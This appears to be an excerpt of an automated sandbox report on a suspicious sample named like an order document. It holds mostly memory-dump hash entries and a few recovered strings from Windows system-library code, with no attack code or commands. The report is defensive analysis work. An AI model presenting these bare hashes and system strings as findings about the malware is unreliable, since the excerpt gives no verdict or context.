                                • Instruction ID: 5a4e0fc743dd232a446fb10de5424d9cf6572cc1ae6acf2d951de2f03d7810f4
                                • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                • Instruction Fuzzy Hash: FDE0EC359516849BDF5ADF59C680F9ABBB5FB94B40F150054E5185B660C724A901CB40
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                • Instruction ID: efe35b5bb724974d1ce2f69b8914a0b4c7114b26e58cc0109fd6f72837ea160a
                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                • Instruction Fuzzy Hash: 78D0223232203093CB2C96557800F63AA09AFC0AD4F0A002D381AD3804C2048C43C2E0
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                • Instruction ID: 51e3c08f3da442705afde6c9bd245d8c3925e87ec72da169c62dae0e7fb2fb77
                                • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                • Instruction Fuzzy Hash: EBD022370E010CFBCB119F62CC01F903BA8E760BA0F004020B914870A0C63AE850C580
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f0235248c90c2e691226bb83edef35311cc9c3986ac3171a99ce05d7932ad793
                                • Instruction ID: d31eb231f455f2845dbac087c50f977c110227ba96f188e7d576388adf41cc7e
                                • Opcode Fuzzy Hash: f0235248c90c2e691226bb83edef35311cc9c3986ac3171a99ce05d7932ad793
                                • Instruction Fuzzy Hash: A1D09E34655502DBDF1EEB59C554BAA7E78EB14A81B400068E61152520E369DD019A50
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                • Instruction ID: e0f2aeb1723b366c1e216c922e1f74140d7b754a7641d598f42fbdd10b777592
                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                • Instruction Fuzzy Hash: 51D0C939212E80CFD76FCB4CC5A4B1573A4BB48B84FC50490F801CBB22D7ACE980CA00
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                • Instruction ID: 2d413a822a135f6e528a49668e7cc92221f7930e409ff582c9bb85487012a869
                                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                • Instruction Fuzzy Hash: 3FC01232150644AFC7159A95CD01F0177A9E798B40F000021F61447570C671E811D644
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                • Instruction ID: a7f24bb556cf55ec217ac3f89ab4b6b11bf121d469d8907085ad6506e52992c8
                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                • Instruction Fuzzy Hash: 6ED01236100288EFCB05DF41C890D9A772AFBD8710F108019FD19077108A32ED62DA50
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                • Instruction ID: f433abd490de2097aada17e30a7205f0dbff20f91af169121b4ed74ef096becd
                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                • Instruction Fuzzy Hash: F3C04C75711541CFCF19DB19D294F4977F4F744754F150890E855CB721E724E801CA10
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6600acb80c8db212c336adf98dd6e0edbbe1f96e9ba1352b21325d41aa56077e
                                • Instruction ID: 2e5d6cf6f3a9c3c70fdb56af09f60718391b73a8b05ba2d5ecd6435060ad250e
                                • Opcode Fuzzy Hash: 6600acb80c8db212c336adf98dd6e0edbbe1f96e9ba1352b21325d41aa56077e
                                • Instruction Fuzzy Hash: 88900231A05804129644715849845464005A7E1301B55C011E0529554CCB188A565365
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dd5c2863f5a4e42dd540f216d8a1c270233b0d3f964697712e4739c7b6abaae1
                                • Instruction ID: f485a2cc6ab4c04b3fc7a3a7be46ff5aed69c869646334dbac693c55ef67dd6a
                                • Opcode Fuzzy Hash: dd5c2863f5a4e42dd540f216d8a1c270233b0d3f964697712e4739c7b6abaae1
                                • Instruction Fuzzy Hash: 2A900261A01504424644715849044066005A7E2301395C115A0659560CC71C8955936D
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a8e01c1856d564770d700b1282a877075fb131ad962a63672b94df5aeef76ad3
                                • Instruction ID: d631c6cd211f95dcdb2cd3cc07da6cf003d3ce6adb7a3f464ee3bd6331a6f4d2
                                • Opcode Fuzzy Hash: a8e01c1856d564770d700b1282a877075fb131ad962a63672b94df5aeef76ad3
                                • Instruction Fuzzy Hash: DE90023160140C02D60871584904686000597D1301F55C011A6129655ED76989917235
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 146b77c3abc2336b8aa508db11fed403a1ac9d2cc670f3c95c051b323c1399a3
                                • Instruction ID: 4fb196aafbd7cdcde687f0a78cde87be3d641a94c62e3604678c984251e28df8
                                • Opcode Fuzzy Hash: 146b77c3abc2336b8aa508db11fed403a1ac9d2cc670f3c95c051b323c1399a3
                                • Instruction Fuzzy Hash: FB900231A0540C02D65471584514746000597D1301F55C011A0129654DC7598B5577A5
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fe3949cf1fafa6988f28e7a9f67b72529e5d573feca98893075e5bdc1e77f09c
                                • Instruction ID: 407f892a39e34516c5b5805b39eabd21189b018460b8341285edd15cec6e5067
                                • Opcode Fuzzy Hash: fe3949cf1fafa6988f28e7a9f67b72529e5d573feca98893075e5bdc1e77f09c
                                • Instruction Fuzzy Hash: 7790023160544C42D64471584504A46001597D1305F55C011A0169694DD7298E55B765
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6789c6f663f114cee821f9c8bb52c3e5a13f58c0c3dc75218aa485cde9147799
                                • Instruction ID: 7b5b6e54d3c3d2d59d4301260de845eeefea64636064ce94773ac678fb99c832
                                • Opcode Fuzzy Hash: 6789c6f663f114cee821f9c8bb52c3e5a13f58c0c3dc75218aa485cde9147799
                                • Instruction Fuzzy Hash: DC9002A1601544924A04B2588504B0A450597E1201B55C016E1159560CC62989519239
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: de28d6821e86917d7367a2f07ea26452526c99efc74dd78c96d7039dd1466e7e
                                • Instruction ID: c85038e9d6c54db59b54205f9a01a81134952f3d6d80ccea4bc2134b22b2cd41
                                • Opcode Fuzzy Hash: de28d6821e86917d7367a2f07ea26452526c99efc74dd78c96d7039dd1466e7e
                                • Instruction Fuzzy Hash: CC900225621404020649B558070450B0445A7D7351395C015F151B590CC72589655325
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5b786e14abdaf86fbf1de0dfd516863130207c01698e30ee72e320cb7e30e8d7
                                • Instruction ID: 3c48e052ab5b18b2401e9dfad7c68d26e592d43625a1b4f55cfaddfc5c2e8646
                                • Opcode Fuzzy Hash: 5b786e14abdaf86fbf1de0dfd516863130207c01698e30ee72e320cb7e30e8d7
                                • Instruction Fuzzy Hash: 0A90022160544842D60475585508A06000597D1205F55D011A1169595DC7398951A235
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f20acb2d0d4920bd98a1e061915169be6cfb9771a91593f0e25f8e1a73b869ef
                                • Instruction ID: 85466e82cd0716d3c6f5520227329c3ebf895b9a2d99aba626d06b4ef6694db1
                                • Opcode Fuzzy Hash: f20acb2d0d4920bd98a1e061915169be6cfb9771a91593f0e25f8e1a73b869ef
                                • Instruction Fuzzy Hash: AA90023164140802D645715845046060009A7D1241F95C012A0529554EC7598B56AB65
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cac40c11144f2c89d81ef6927035f9956b24432c419cc5f81b5b2a7bf961ca85
                                • Instruction ID: 4f9104e15158d931f6dfb225c00ee6986bcff24af9195da7602ea381d7edae9d
                                • Opcode Fuzzy Hash: cac40c11144f2c89d81ef6927035f9956b24432c419cc5f81b5b2a7bf961ca85
                                • Instruction Fuzzy Hash: 4D90023160140C42D60471584504B46000597E1301F55C016A0229654DC719C9517625
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 674dfd3653c868597b75d958891650ca6acc499957e2dfb7fb482c9328b813d2
                                • Instruction ID: eb1632c5ecca65c7390a49714d8a7bd4c267c93781530100fb189fa1450e7963
                                • Opcode Fuzzy Hash: 674dfd3653c868597b75d958891650ca6acc499957e2dfb7fb482c9328b813d2
                                • Instruction Fuzzy Hash: CA900221A0540802D64471585518706001597D1201F55D011A0129554DC75D8B5567A5
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 035dcafaf36e38f550e8edb957800db54e096a255650fdc8ab8f63831a6d1f5d
                                • Instruction ID: 6b910e5e7b22a61f9829f952392c8feca36154478e16c1012e5e632268763436
                                • Opcode Fuzzy Hash: 035dcafaf36e38f550e8edb957800db54e096a255650fdc8ab8f63831a6d1f5d
                                • Instruction Fuzzy Hash: 7C90023160140803D60471585608707000597D1201F55D411A0529558DD75A89516225
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 88edafaab907f73522e5bcfb451a07af3067cc91f778770d39422dccc9c9e8fc
                                • Instruction ID: 889b18005658c252d34282b1f044931eab52c92ade28d659ab90fbae6e294a2c
                                • Opcode Fuzzy Hash: 88edafaab907f73522e5bcfb451a07af3067cc91f778770d39422dccc9c9e8fc
                                • Instruction Fuzzy Hash: B890026161140442D60871584504706004597E2201F55C012A2259554CC62D8D615229
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e006bcb3b33859f9cc816a343d67de00955008bb87a86001585e4dfd24f80bf5
                                • Instruction ID: b0acb2bac9d1ec43847d5cfba919e21b3871a904e6a0d335b30ebf301061e6e9
                                • Opcode Fuzzy Hash: e006bcb3b33859f9cc816a343d67de00955008bb87a86001585e4dfd24f80bf5
                                • Instruction Fuzzy Hash: 9490023160180802D60471584908747000597D1302F55C011A5269555EC769C9916635
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c023c9aa22db75295525b50477b1aa385b53cee29d096b0e7afa30a67a388df4
                                • Instruction ID: d9851a85df3b318350d58a98d6c267f44791816021daae1c6043a17baa037b3e
                                • Opcode Fuzzy Hash: c023c9aa22db75295525b50477b1aa385b53cee29d096b0e7afa30a67a388df4
                                • Instruction Fuzzy Hash: 3B90022170140802D606715845146060009D7D2345F95C012E1529555DC7298A53A236
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 776e9e8a0714faf0d3f63563c778e4c2d738628cb04352997c14f9612ce5419f
                                • Instruction ID: 3ec936a56750f80bca4f77ceb99008f9acc82191a06ce1aa36c264b0eb0cbdde
                                • Opcode Fuzzy Hash: 776e9e8a0714faf0d3f63563c778e4c2d738628cb04352997c14f9612ce5419f
                                • Instruction Fuzzy Hash: A790026160180803D64475584904607000597D1302F55C011A2169555ECB2D8D516239
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c15f2c3159a6390166eee9e77feedf9cecd9e3483171c4df49858a180dff1b1f
                                • Instruction ID: 600b37099330be1b0c83f0931be31060b0a272803b8a9e48d4e8541aea0725eb
                                • Opcode Fuzzy Hash: c15f2c3159a6390166eee9e77feedf9cecd9e3483171c4df49858a180dff1b1f
                                • Instruction Fuzzy Hash: B490022160184842D64472584904B0F410597E2202F95C019A425B554CCA1989555725
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7c05b62aa096bf6e60a817ab1107dc6fc4c50d8d5c81a4cadca4a28426368d00
                                • Instruction ID: c5a59619c55f27e4808ac809120ecf237e2709073a495f7d00657f72810e6375
                                • Opcode Fuzzy Hash: 7c05b62aa096bf6e60a817ab1107dc6fc4c50d8d5c81a4cadca4a28426368d00
                                • Instruction Fuzzy Hash: 3990022164140C02D644715885147070006D7D1601F55C011A0129554DC71A8A6567B5
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 774690b69b33b97f2f5c4965475795bdebd26cebad3e38f4ddeefcc0e1412543
                                • Instruction ID: c69c9fc33a7f4114a80cc5d3d98ced325acaacba2db3faa974abbb3cf96745a6
                                • Opcode Fuzzy Hash: 774690b69b33b97f2f5c4965475795bdebd26cebad3e38f4ddeefcc0e1412543
                                • Instruction Fuzzy Hash: 15900231A0550802D60471584614706100597D1201F65C411A0529568DC7998A5166A6
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fbf70f123e9269724f0526a7a45b451a5778b5452c361665d3bc8d798e201df4
                                • Instruction ID: f1312ad86998376537bfefb9ed775953282df45adb6965f87807943ef8526bd7
                                • Opcode Fuzzy Hash: fbf70f123e9269724f0526a7a45b451a5778b5452c361665d3bc8d798e201df4
                                • Instruction Fuzzy Hash: B490022164545502D654715C45046164005B7E1201F55C021A0919594DC65989556325
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 933cd6584adbf17dc7c23e926d53eb28c99ab3b2bba17f2324ca04ed723b2bff
                                • Instruction ID: da17f8620cf5c627ab2d50de54acbed0263c0aef1acacf6a69e0a0736d723b5b
                                • Opcode Fuzzy Hash: 933cd6584adbf17dc7c23e926d53eb28c99ab3b2bba17f2324ca04ed723b2bff
                                • Instruction Fuzzy Hash: 67900231602405429A4472585904A4E410597E2302B95D415A011A554CCA1889615325
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8aae81b8fee63832df4140ce2c6249bf0c770f994d647528a91224aaa4ed4339
                                • Instruction ID: 1b727cb4021aa1562d745d7d74c6e0ea986f35873c178209b7ba02a95b05feca
                                • Opcode Fuzzy Hash: 8aae81b8fee63832df4140ce2c6249bf0c770f994d647528a91224aaa4ed4339
                                • Instruction Fuzzy Hash: FA90023560140802DA1471585904646004697D1301F55D411A0529558DC75889A1A225
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                • Instruction ID: 0075205a8685af95dc3ad3e065614918109edc0fff6d869f7f2599a636ebb662
                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                • Instruction Fuzzy Hash:
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                • API String ID: 48624451-2108815105
                                • Opcode ID: 94eb677ab28fdeb630383a9885a77332ae0fa56281b3413367c57c9b29f26e41
                                • Instruction ID: 69707687f69e99cd1cb41684c8419a7aa1c1aa1f2a8deb61de72fea51323fc01
                                • Opcode Fuzzy Hash: 94eb677ab28fdeb630383a9885a77332ae0fa56281b3413367c57c9b29f26e41
                                • Instruction Fuzzy Hash: FF51D6B5E00116BFCF1AEB9D889097EFBF8BB49240714C169E465D7645E334DE50CBA0
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                • API String ID: 48624451-2108815105
                                • Opcode ID: 8ea2b0c3605b3a27e7399c1b8011248b1d234d543d5e95d6c25feeeca204d8d1
                                • Instruction ID: b48932e4e2b2988d452666c421728d361617968f38b1710bd57b9250fc561fc5
                                • Opcode Fuzzy Hash: 8ea2b0c3605b3a27e7399c1b8011248b1d234d543d5e95d6c25feeeca204d8d1
                                • Instruction Fuzzy Hash: 94510675A04646AFDB38DF9CC8909BFBBF9EB48200B04845DE6A6D7641E7B4DA40C760
                                Strings
                                • ExecuteOptions, xrefs: 011B46A0
                                • Execute=1, xrefs: 011B4713
                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 011B4787
                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011B46FC
                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 011B4655
                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 011B4742
                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 011B4725
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                • API String ID: 0-484625025
                                • Opcode ID: 1a665e051f5ffc97a20899f42fe36af8a1123e31480bdcc17ab3c6c45dfd7dbf
                                • Instruction ID: 5a064d150f2aa202352219ff063d68271cdff5cbeda218f01088ee5c1b9e6775
                                • Opcode Fuzzy Hash: 1a665e051f5ffc97a20899f42fe36af8a1123e31480bdcc17ab3c6c45dfd7dbf
                                • Instruction Fuzzy Hash: 8B51FB31A0021A7AEF1DEBA8EC9DFED77B9AF14704F0400A9E605A72C1E7719A45CF51
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: +$-$0$0
                                • API String ID: 1302938615-699404926
                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                • Instruction ID: fe45715b8f8d229e94fc45f6a92100cda8e7df24535097717a438fc5954938b5
                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                • Instruction Fuzzy Hash: 9681D170E196498EEF2DBE6CC8507FEBBB1AF46324F28C119D861A72D1C73498408F59
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: %%%u$[$]:%u
                                • API String ID: 48624451-2819853543
                                • Opcode ID: 6f1c41d52d4601b9be3ce053fa0e97d503a9fe5ccf1d5f168e599a915f5c2b97
                                • Instruction ID: d4c53aeaa99499daddf9d6f500d89c21c6b3213981457bf18748543585adddbd
                                • Opcode Fuzzy Hash: 6f1c41d52d4601b9be3ce053fa0e97d503a9fe5ccf1d5f168e599a915f5c2b97
                                • Instruction Fuzzy Hash: 5621657AA00119ABDB19DF79DC40AEFBBF8EF54644F44011AEA15D3200E730D9018BA5
                                Strings
                                • RTL: Re-Waiting, xrefs: 011B031E
                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011B02E7
                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011B02BD
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                • API String ID: 0-2474120054
